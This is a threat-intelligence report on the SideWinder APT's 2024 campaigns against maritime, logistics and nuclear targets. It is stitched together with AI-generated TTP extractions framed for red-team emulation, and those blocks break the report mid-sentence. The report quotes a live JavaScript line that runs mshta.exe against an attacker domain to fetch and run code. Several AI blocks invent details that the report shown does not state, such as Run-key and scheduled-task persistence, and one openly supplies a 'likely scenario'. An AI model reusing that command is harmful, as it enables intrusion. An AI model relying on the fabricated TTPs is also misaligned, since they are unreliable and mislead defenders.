SideWinder targets the maritime and nuclear sectors with an updated toolset Giampaolo Dedola Last year, we published an article about SideWinder, a highly prolific APT group whose primary targets have been military and government entities in Pakistan, Sri Lanka, China, and Nepal. In it, we described activities that had mostly happened in the first half of the year. We tried to draw attention to the group, which was aggressively extending its activities beyond their typical targets, infecting government entities, logistics companies and maritime infrastructures in South and Southeast Asia, the Middle East, and Africa. We also shared further information about SideWinder’s post-exploitation activities and described a new sophisticated implant designed specifically for espionage. We continued to monitor the group throughout the rest of the year, observing intense activity that included updates to SideWinder’s toolset and the creation of a massive new infrastructure to spread malware and control compromised systems. The targeted sectors were consistent with those we had seen in the first part of 2024, but we noticed a new and significant increase in attacks against maritime infrastructures and logistics companies. In 2024, we initially observed a significant number of attacks in Djibouti. Subsequently, the attackers shifted their focus to other entities in Asia and showed a strong interest in targets within Egypt. Moreover, we observed other attacks that indicated a specific interest in nuclear power plants and nuclear energy in South Asia and further expansion of activities into new countries, especially in Africa.

Phase: Initial Access

• Technique: Phishing via Malicious Document
• Procedure: The attacker uses spear-phishing emails containing malicious documents designed to exploit vulnerabilities or execute macros.

Phase: Execution

• Technique: New Sophisticated Implant
• Procedure: Deployment of a custom implant for espionage activities, likely involving remote command execution.

Phase: Persistence

• Technique: Scheduled Tasks or Services
• Procedure: The implant likely uses scheduled tasks or installs as a service to maintain persistence.

Phase: Command and Control

• Technique: Use of Massive Infrastructure
• Procedure: Leveraging an extensive infrastructure to control compromised systems and potentially using custom encryptions or protocols for secure communication.

Phase: Impact

• Technique: Data Collection and Exfiltration
• Procedure: The implant collects sensitive information from compromised systems, focusing on espionage within the maritime, logistics, and nuclear sectors.

Countries and territories targeted by SideWinder in the maritime and logistics sectors in 2024 It is worth noting that SideWinder constantly works to improve its toolsets, stay ahead of security software detections, extend persistence on compromised networks, and hide its presence on infected systems. Based on our observation of the group’s activities, we presume they are constantly monitoring detections of their toolset by security solutions. Once their tools are identified, they respond by generating a new and modified version of the malware, often in under five hours. If behavioral detections occur, SideWinder tries to change the techniques used to maintain persistence and load components. Additionally, they change the names and paths of their malicious files. Thus, monitoring and detection of the group’s activities reminds us of a ping-pong game. Infection vectors The infection pattern observed in the second part of 2024 is consistent with the one described in the previous article. Infection flow The attacker sends spear-phishing emails with a DOCX file attached. The document uses the remote template injection technique to download an RTF file stored on a remote server controlled by the attacker. The file exploits a known vulnerability (CVE-2017-11882) to run a malicious

Phase: Initial Access

• Technique: Spear-Phishing with Malicious Document
• Procedure: The attacker sends spear-phishing emails containing a DOCX file that uses remote template injection to download an RTF file.

Phase: Execution

• Technique: Exploitation for Client Execution
• Procedure: The RTF file exploits a known vulnerability (CVE-2017-11882) to execute malicious code on the target system.

Phase: Defense Evasion

• Technique: Obfuscated Files or Information
• Procedure: SideWinder modifies their malware quickly upon detection, changing names and paths of malicious files to avoid detection.

Phase: Persistence

• Technique: Modify Existing Services
• Procedure: If behavioral detections occur, the group changes the techniques used to maintain persistence, potentially modifying existing system services.

Phase: Command and Control

• Technique: Remote File Copy
• Procedure: Implements remote template injection to download malware components from attacker-controlled servers.

Phase: Impact

• Technique: Data Manipulation
• Procedure: Continuous adaptation in toolset to extend persistence on compromised networks and evade detection.

shellcode and initiate a multi-level infection process that leads to the installation of malware we have named “Backdoor Loader”. This acts as a loader for “StealerBot”, a private post-exploitation toolkit used exclusively by SideWinder. The documents used various themes to deceive victims into believing they are legitimate. Some documents concerned nuclear power plants and nuclear energy agencies. Malicious documents related to nuclear power plants and energy Many others concerned maritime infrastructures and various port authorities. Malicious documents relating to maritime infrastructures and different port authorities In general, the detected documents predominantly concerned governmental decisions or diplomatic issues. Most of the attacks were aimed at various national ministries and diplomatic entities. We also detected various documents that covered generic topics. For example, we found a

Phase: Initial Access

• Technique: Spear-Phishing via Malicious Document
• Procedure: The attacker sends carefully themed malicious Word documents exploiting topics like nuclear energy, maritime infrastructures, and government diplomacy to deceive recipients into enabling macros.

Phase: Execution

• Technique: Malicious Macro Execution
• Procedure: When macros are enabled, the document executes shellcode to initiate a multi-level infection process.

Phase: Payload Deployment

• Technique: Malware Loader Deployment
• Procedure: The shellcode installs “Backdoor Loader,” which acts as a conduit for further payload installation.

Phase: Post-Exploitation

• Technique: StealerBot Toolkit Deployment
• Procedure: “Backdoor Loader” downloads and runs “StealerBot,” a private post-exploitation toolkit used for further actions on compromised systems.

Each step builds on the previous one to ensure the deployment of malicious payloads and tools with minimal detection, targeting entities of national importance.

document with information on renting a car in Bulgaria, a document expressing an intent to buy a garage, and another document offering a freelance video game developer a job working on a 3D action-adventure game called “Galactic Odyssey”. Examples of generic malicious documents RTF exploit The exploit file contained a shellcode, which had been updated by the attacker since our previous research, but the main goal remained the same: to run embedded JavaScript code invoking the mshtml.RunHTMLApplication function. In the new version, the embedded JavaScript runs the Windows utility mshta.exe and obtains additional code from a remote server: javascript:eval("var gShZVnyR = new ActiveXObject('WScript.Shell');gShZVnyR.Run('mshta.exe https://dgtk.depo-govpk[.]com/19263687/trui',0);window.close();") The newer version of the shellcode still uses certain tricks to avoid sandboxes and complicate analysis, although they differ slightly from those in past versions. It uses the GlobalMemoryStatusEx function to determine the size of RAM. It attempts to load the nlssorting.dll library and terminates execution if operation succeeds. JavaScript loader The RTF exploit led to the execution of the mshta.exe Windows utility, abused to download a malicious HTA from a remote server controlled by the attacker. mshta.exe hxxps://dgtk.depo-govpk[.]com/19263687/trui The remote HTA embeds a heavily obfuscated JavaScript file that loads further malware, the “Downloader Module”, into memory. The JavaScript loader operates in two stages. The first stage begins execution by loading various strings, initially encoded with a substitution algorithm and stored as variables. It then checks the

Phase: Initial Access

• Technique: Malicious Document Delivery via RTF Exploit
• Procedure: The threat actor utilizes RTF documents with embedded shellcode to deliver malicious payloads. The RTF exploit triggers embedded JavaScript code using mshtml.RunHTMLApplication.

Phase: Execution

• Technique: mshta Abuse for Code Execution
• Command: mshta.exe https://dgtk.depo-govpk[.]com/19263687/trui
• Procedure: The shellcode executes this command to run the Windows utility mshta.exe, downloading a malicious HTA from a remote server.

Phase: Defense Evasion

• Technique: Anti-Sandboxing Techniques
• Procedure:
• Uses GlobalMemoryStatusEx to check RAM size.
• Attempts to load nlssorting.dll and terminates if successful. These measures aim to avoid sandbox environments and hinder analysis.

Phase: Execution (Continued)

• Technique: Obfuscated JavaScript Execution
• Procedure: The remote HTA contains heavily obfuscated JavaScript that downloads the next stage malware, referred to as the “Downloader Module.”

Phase: Initial Access (JavaScript Loader)

• Technique: Obfuscated JavaScript Execution
• Procedure: The JavaScript loader executes in stages:
• Stage 1: Decodes strings using a substitution algorithm, stored as variables, to proceed with further loading operations.

installed RAM and terminates if the total size is less than 950 MB. Otherwise, the previously decoded strings are used to load the second stage. The second stage is another JavaScript file. It enumerates the subfolders at Windows% \Microsoft.NET\Framework\ to find the version of the .NET framework installed on the system and uses the resulting value to configure the environment variable COMPLUS_Version. Finally, the second stage decodes and loads the Downloader Module, which is embedded within its code as a base64-encoded .NET serialized stream. Downloader Module This component is a .NET library used to collect information about the installed security solution and download another component, the “Module Installer”. These components were already described in the previous article and will not be detailed again here. In our latest investigation, we discovered a new version of the app.dll Downloader Module, which includes a more sophisticated function for identifying installed security solutions. In the previous version, the malware used a simple WMI query to obtain a list of installed products. The new version uses a different WMI, which collects the name of the antivirus and the related “productState”. Furthermore, the malware compares all running process names against an embedded dictionary. The dictionary contains 137 unique process names associated with popular security solutions. The WMI query is executed only when no Kaspersky processes are running on the system. Backdoor Loader The infection chain concludes with the installation of malware that we have named “Backdoor Loader”, a library consistently sideloaded using a legitimate and signed application. Its primary function is to load the “StealerBot” implant into memory. Both the “Backdoor Loader” and “StealerBot” were thoroughly described in our prior article, but the attacker has distributed numerous variants of the loader in recent months, whereas the implant has remained unchanged. In the previous campaign, the “Backdoor Loader” library was designed to be loaded by two specific programs. For correct execution, it had to be stored on victims’ systems under one of the following names: During the most recent campaign, the attackers tried to diversify the samples, generating many other variants distributed under the following names: JetCfg.dll policymanager.dll winmm.dll

Phase: Reconnaissance

• Technique: System Information Discovery
• Procedure: Check installed RAM and terminate the process if it is less than 950 MB.
• Method: Evaluate system resources to decide execution of further stages.

Phase: Execution

• Technique: Environment Variable Configuration
• Command: Enumerate subfolders in %Windows%\Microsoft.NET\Framework\ to determine the .NET framework version.
• Procedure: Use the .NET version to configure the COMPLUS_Version environment variable for subsequent operations.

Phase: Execution

• Technique: Base64 Decoding and Execution
• Procedure: Decode and load a base64-encoded .NET serialized stream, executing it as the Downloader Module.

Phase: Discovery

• Technique: Security Software Discovery
• Procedure: Utilize WMI for gathering the name of installed antivirus software and its productState.
• Command: Execute WMI queries for identifying security products only if Kaspersky processes are absent.

Phase: Defense Evasion

• Technique: Process Name Comparison
• Procedure: Compare running process names against an embedded dictionary of 137 security-related process names.

Phase: Persistence and Execution

• Technique: DLL Sideloading
• Procedure: Use "Backdoor Loader" library sideloaded by legitimate signed applications to load the "StealerBot" implant.
• Note: Variants of the loader are named "JetCfg.dll", "policymanager.dll", and "winmm.dll".

xmllite.dll dcntel.dll UxTheme.dll The new malware variants feature an enhanced version of anti-analysis code and employ Control Flow Flattening more extensively to evade detection. During the investigation, we found a new C++ version of the “Backdoor Loader” component. The malware logic is the same as that used in the .NET variants, but the C++ version differs from the .NET implants in that it lacks anti-analysis techniques. Furthermore, most of the samples were tailored to specific targets, as they were configured to load the second stage from a specific file path embedded in the code, which also included the user’s name. Example: C:\Users[REDACTED]\AppData\Roaming\valgrind[REDACTED FILE NAME]. [REDACTED EXTENSION] It indicates that these variants were likely used after the infection phase and manually deployed by the attacker within the already compromised infrastructure, after validating the victim. Victims SideWinder continues to attack its usual targets, especially government, military, and diplomatic entities. The targeted sectors are consistent with those observed in the past, but it is worth mentioning that the number of attacks against the maritime and the logistics sectors has increased and expanded to Southeast Asia. Furthermore, we observed attacks against entities associated with nuclear energy. The following industries were also affected: telecommunication, consulting, IT service companies, real estate agencies, and hotels.

Phase: Delivery

• Technique: Tailored Payload Delivery
• Procedure: The malware is manually deployed by the attacker after the infection phase, tailored to specific targets and configured to load the second stage from specific file paths, such as C:\Users\[REDACTED]\AppData\Roaming\valgrind\[REDACTED FILE NAME].[REDACTED EXTENSION].

Phase: Defense Evasion

• Technique: Control Flow Flattening
• Procedure: The malware variants utilize Control Flow Flattening extensively to evade detection and complicate analysis.

Phase: Execution

• Technique: C++ Backdoor Loader
• Procedure: A new C++ version of a "Backdoor Loader" component is used, which lacks the anti-analysis techniques present in the .NET variants, maintaining the same core malware logic for deploying payloads.

Phase: Deployment

• Technique: Targeted Deployment
• Procedure: Samples are manually tailored and deployed based on embedded file paths specific to the user and environment, indicating selective targeting post-infection.

Countries and territories targeted by SideWinder in 2024 Overall, the group has further extended its activities, especially in Africa. We detected attacks in Austria, Bangladesh, Cambodia, Djibouti, Egypt, Indonesia, Mozambique, Myanmar, Nepal, Pakistan, Philippines, Sri Lanka, the United Arab Emirates, and Vietnam. In this latest wave of attacks, SideWinder also targeted diplomatic entities in Afghanistan, Algeria, Bulgaria, China, India, the Maldives, Rwanda, Saudi Arabia, Turkey, and Uganda. Conclusion SideWinder is a very active and persistent actor that is constantly evolving and improving its toolkits. Its basic infection method is the use of an old Microsoft Office vulnerability, CVE-2017-11882, which once again emphasizes the critical importance of installing security patches. Despite the use of an old exploit, we should not underestimate this threat actor. In fact, SideWinder has already demonstrated its ability to compromise critical assets and high-profile entities, including those in the military and government. We know the group’s software development capabilities, which became evident when we observed how quickly they could deliver updated versions of their tools to evade detection, often within hours. Furthermore, we know that their toolset also includes advanced malware, like the sophisticated in-memory implant “StealerBot” described in our previous article. These capabilities make them a highly advanced and dangerous adversary. To protect against such attacks, we strongly recommend maintaining a patch management process to apply security fixes (you can use solutions like Vulnerability Assessment and Patch Management and Kaspersky Vulnerability Data Feed) and using a comprehensive security solution that provides incident detection and response, as well as threat hunting. Our product line for businesses helps identify and prevent attacks of any complexity at an early stage. The campaign described in this article relies on spear-phishing emails as the initial attack vector, which highlights the importance

Phase: Initial Access

• Technique: Spear-Phishing with Malicious Document
• Procedure: Delivery of spear-phishing emails containing a malicious Microsoft Office document exploiting CVE-2017-11882.

Phase: Execution

• Technique: Exploitation for Client Execution
• Procedure: Exploit Microsoft Office vulnerability (CVE-2017-11882) to execute code upon opening the malicious document.

Phase: Implant Deployment

• Technique: In-Memory Implant
• Tool/Program: Deployment of advanced malware such as "StealerBot" directly in-memory to avoid detection and persist on the system.

Phase: Evasion

• Technique: Software Update and Evasion
• Procedure: Rapid updates to malware toolsets to evade detection, demonstrating advanced software development capabilities.

Phase: Persistence

• Technique: Persistence through In-Memory Execution
• Procedure: Utilize in-memory implant techniques to maintain persistence without writing to disk, reducing traces.

Phase: Reconnaissance

• Technique: Use of In-Memory Tools
• Procedure: Gather information on the compromised network using in-memory tools to avoid triggering traditional detection mechanisms.

Phase: Impact

• Technique: Data Exfiltration and Compromise of Assets
• Procedure: Target critical and high-profile assets, including military and government entities, for sensitive data exfiltration.

These procedures highlight SideWinder's advanced capabilities in exploiting vulnerabilities and utilizing sophisticated techniques to avoid detection, making them a significant threat.

of regular employee training and awareness programs for corporate security. We will continue to monitor the activity of this group and to update heuristic and behavioral rules for effective detection of malware. ***More information, IoCs and YARA rules for SideWinder are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com. Indicators of compromise Microsoft Office Documents e9726519487ba9e4e5589a8a5ec2f933 d36a67468d01c4cb789cd6794fb8bc70 313f9bbe6dac3edc09fe9ac081950673 bd8043127abe3f5cfa61bd2174f54c60 e0bce049c71bc81afe172cd30be4d2b7 872c2ddf6467b1220ee83dca0e118214 3d9961991e7ae6ad2bae09c475a1bce8 a694ccdb82b061c26c35f612d68ed1c2 f42ba43f7328cbc9ce85b2482809ff1c Backdoor Loader 0216ffc6fb679bdf4ea6ee7051213c1e 433480f7d8642076a8b3793948da5efe Domains and IPs pmd-office[.]info modpak[.]info dirctt888[.]info modpak-info[.]services pmd-offc[.]info dowmloade[.]org dirctt888[.]com portdedjibouti[.]live mods[.]email dowmload[.]co downl0ad[.]org d0wnlaod[.]com d0wnlaod[.]org dirctt88[.]info

The provided text primarily consists of IOCs and does not contain specific command lines or executable tools used by a threat actor. Therefore, there are no detailed TTPs to extract. I'll provide a likely scenario based on common attack methods associated with similar contexts.

Phase: Initial Access

• Technique: Phishing via Malicious Document
• Procedure: Attacker sends a spear-phishing email containing a malicious Microsoft Office document with embedded macros.

Phase: Execution

• Technique: Execution via Office Application
• Inferred Procedure: Enabled macros execute PowerShell or other scripts to download additional payloads.

Phase: Persistence

• Technique: Backdoor Installation
• Inferred Procedure: Deployment of backdoor loader to maintain access.

Phase: Command and Control

• Technique: Remote Command Execution
• Inferred Procedure: Use of a backdoor to communicate with command and control servers (domains mentioned).

These inferred procedures reflect typical tactics used in similar attack scenarios, which would involve phishing to gain initial access and scripts for further compromise.

Model: gemini-2.0-flash

Okay, I will extract and structure the TTPs (Tactics, Techniques, and Procedures) from the provided CTI report, focusing on executable actions and excluding passive IOCs.

Phase: Initial Access

• Technique: Spear Phishing via Malicious Document
• Procedure: The attacker sends spear-phishing emails with a DOCX file attached. The document uses the remote template injection technique to download an RTF file.

Phase: Execution

• Technique: RTF Exploit (CVE-2017-11882)

• Procedure: The RTF file exploits the vulnerability to run a malicious shellcode and initiate multi-level infection process.

• Technique: Executing mshta.exe

• Command: mshta.exe to execute the malicious HTA from a remote server. mshta.exe <remote server>/<path_to_hta>

• Technique: JavaScript Execution within HTA

• Procedure: Executes heavily obfuscated JavaScript to load further malware.

Phase: Discovery

• Technique: System Information Gathering (.NET)

• Procedure: The Downloader Module enumerates the subfolders at Windows%\Microsoft.NET\Framework\ to find the version of the .NET framework installed on the system and uses the resulting value to configure the environment variable COMPLUS_Version.

• Technique: Antivirus Product Detection via WMI.

• Procedure: Query the WMI to obtain a list of installed products and anti virus.
• Technique: Running Process Enumeration and Comparison
• Procedure: Compare all running process names against an embedded dictionary.
• Technique: Determine RAM size with GlobalMemoryStatusEx function.

Phase: Persistence

• Technique: Scheduled Task Creation (Implied)

• Procedure: While not explicitly mentioned, the registry key and persistence mechanisms imply the use of scheduled tasks for recurring execution. (Note: No direct command is provided but is implied)

• Technique: Registry Run Key Modification (Implied)

• Procedure: Adding HKCU Run Registry Value for persitence. (Note: No direct command is provided but is implied)

Phase: Payload Delivery / Post Exploitation

• Technique: DLL Side-Loading.

• Procedure: Use a legitimate application, side loading it with a malicious DLL.

• Technique: Memory Injection

• Procedure: Backdoor Loader loads "StealerBot" implant into memory.

Phase: Credential Access

• Technique: Credential Stealing (StealerBot).

• Procedure: Post Exploitation, credential stealing with "StealerBot" from memory.

Notes and Inferred Tactics

• The report emphasizes the continuous evolution of the attacker's toolset to evade detection, implying frequent updates to code and obfuscation techniques.
• The tailored nature of certain samples to specific targets and inclusion of the user's name suggests a manual deployment phase by the attacker, likely involving some form of interactive access.

This structured output summarizes the TTPs described in the CTI report, focusing on executable actions and relevant context to facilitate red team emulation.

Model: gemini-2.5-flash-preview-05-20

Here's a structured breakdown of the procedures used by the SideWinder threat actor, suitable for red team emulation:

Phase: Initial Access

• Technique: Spear-Phishing with Malicious Document (DOCX via Remote Template Injection)
  • Procedure: The attacker sends spear-phishing emails containing a malicious DOCX file attached.
  • Procedure: The DOCX document uses the remote template injection technique to download an RTF file from a remote server.
• Technique: Exploit Public-Facing Application (CVE-2017-11882)
  • Procedure: The downloaded RTF file exploits the known vulnerability CVE-2017-11882 to run a malicious shellcode.

Phase: Execution

• Technique: JavaScript Execution
  • Procedure: The shellcode executes embedded JavaScript code.
  • Command (inferred): javascript:eval("var <random_variable_name> = new ActiveXObject('WScript.Shell');<random_variable_name>.Run('mshta.exe <remote_resource_url>',0);window.close();")
• Technique: Signed Binary Proxy Execution (mshta.exe)
  • Procedure: The embedded JavaScript runs the Windows utility mshta.exe to download additional code (a malicious HTA file) from a remote server.
  • Command: mshta.exe <remote_resource_url>
  • Procedure: The remote HTA file contains heavily obfuscated JavaScript that loads a "Downloader Module" into memory.

Phase: Defense Evasion & Discovery (JavaScript Loader & Downloader Module)

• Technique: System Information Discovery (RAM Check)
  • Procedure: The JavaScript loader uses GlobalMemoryStatusEx to determine the installed RAM size.
  • Procedure: Execution terminates if the total RAM size is less than 950 MB.
• Technique: Anti-Static Analysis (DLL Load Check)
  • Procedure: The JavaScript loader attempts to load the nlssorting.dll library.
  • Procedure: Execution terminates if the nlssorting.dll loading operation succeeds.
• Technique: System Information Discovery (Security Software)
  • Procedure: The "Downloader Module" uses a WMI query to collect the name of the antivirus and its related "productState".
  • Procedure: The "Downloader Module" compares all running process names against an embedded dictionary of security solutions (containing 137 unique process names).
  • Procedure: The WMI query for antivirus products is executed only when no known security processes (e.g., specific antivirus vendors) are running on the system.
• Technique: Obfuscated Files or Information (Control Flow Flattening)
  • Procedure: New malware variants feature enhanced anti-analysis code and employ Control Flow Flattening more extensively.
• Technique: Indicator Removal (File Renaming/Path Changes)
  • Procedure: The threat actor frequently changes the names and paths of their malicious files to evade detection.

Phase: Persistence

• Technique: Hijack Execution Flow (DLL Sideloading)
  • Procedure: The "Backdoor Loader" library is consistently sideloaded using a legitimate and signed application.
• Technique: Registry Run Keys / Startup Folder
  • Procedure: The malware establishes persistence by setting an HKCU Run Registry Value.
• Technique: Scheduled Task
  • Procedure: The malware establishes persistence by creating a Windows Task.

Phase: Payload Delivery / Staging

• Technique: Dropper/Loader (Backdoor Loader)
  • Procedure: The "Backdoor Loader" component's primary function is to load the "StealerBot" implant into memory.
• Technique: Staged Deployment (C++ Backdoor Loader)
  • Procedure: C++ versions of the "Backdoor Loader" are tailored to specific targets and configured to load the second stage from a specific file path embedded in the code (e.g., C:\Users\[USER_NAME]\AppData\Roaming\valgrind\[REDACTED_FILE_NAME].[REDACTED_EXTENSION]). This suggests manual deployment after initial compromise.

Phase: Command and Control

• Technique: Standard Application Layer Protocol (HTTPS)
  • Procedure: The C2 server communication uses HTTPS.

Phase: Collection (StealerBot Capabilities)

• Technique: Input Capture (Keylogging)
  • Tool: Keylogger plugin (part of StealerBot)
• Technique: Screen Capture
  • Tool: Screenshot Grabber plugin (part of StealerBot)
• Technique: Data from Local System (File Stealing)
  • Tool: File Stealer plugin (part of StealerBot)
• Technique: Credential Dumping
  • Tool: RDP Credential Stealer plugin (part of StealerBot)
  • Tool: Credential Phisher plugin (part of StealerBot)
• Technique: Token Impersonation/Theft
  • Tool: Token Grabber plugin (part of StealerBot)

Phase: Discovery (StealerBot Capabilities)

• Technique: System Owner/User Discovery
  • Tool: Token Grabber (can be used for this)
• Technique: Process Discovery / System Information Discovery
  • Tool: Live Console (provides real-time interaction and system exploration)

Phase: Privilege Escalation (StealerBot Capabilities)

• Technique: Bypass User Account Control (UAC)
  • Tool: UAC Bypass plugin (part of StealerBot)